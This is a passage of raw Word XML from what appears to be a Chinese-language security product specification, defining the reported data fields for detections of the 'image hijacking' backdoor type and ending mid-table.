      <w:r>
        <w:t>image_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extend_ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x05000000"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E44742" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="499" w:name="_Toc115166322"/>
      <w:bookmarkStart w:id="500" w:name="后门类型映像劫持"/>
      <w:bookmarkEnd w:id="496"/>
      <w:bookmarkEnd w:id="498"/>
      <w:r>
        <w:t>后门类型：映像劫持</w:t>
      </w:r>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w14:paraId="1D8E897E"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2189"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4849"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="03985BD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03D6A70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F28FEFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72CB0181" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7105B908" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="220EE1A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07076122" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="412600A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69F42CC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5766E93E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C8F59CA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF31C8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C9B5479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E04541E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="571BB22D" w14:textId="76DEB0C4" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程信息，</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "processinfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>process_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="087E4759" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02747460" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hijack_image_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A1401F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D25B669" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AD3C01F" w14:textId="5830540D" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">劫持的映像文件信息 </w:t>
            </w:r>
            <w:hyperlink w:anchor="hijackimageinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>hijack_image_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7876A1AC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F83CBE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hijacked_image_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E31CA43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47293D7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1428B363" w14:textId="51155282" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">被劫持的映像文件信息 </w:t>
            </w:r>
            <w:hyperlink w:anchor="hijackimageinfo数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>hijack_image_info数据结构</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A2532F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="501" w:name="_Toc115166323"/>
      <w:bookmarkStart w:id="502" w:name="hijackimageinfo数据结构"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>hijack_image_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2248"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="4481"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7590CE2D"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0218574" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21096485" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="006210B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D273E60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13CC703C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F4292C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4804BA13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78633B13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11DE2F62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1ECB92D2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24FA7907" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3801C31B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36A6BA2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3541223F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所在目录的全路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09420EF0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CC4428" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_directory</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715F590B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71E7E2C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67F3A65C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所在目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="594F02FB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4643B5CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EA23E2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21385A35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E96186" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件md5值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08EA66A0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="473244F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8C2273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11127F81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DB236BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31F50B38" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="236FAE91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E88AB20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1991D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BFBB253" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扩展名，如</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.exe”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="076D1B65" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20BC40EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7113BF47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D9DF850" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="504BCFBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件属性，无效时为INVALID_FILE_ATTRIBUTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="65A3CCB3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FC098BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>b_pe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB009C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E7350C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58EF0BC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否是PE文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D9F7191" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F0CF16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_base_str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C455396" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
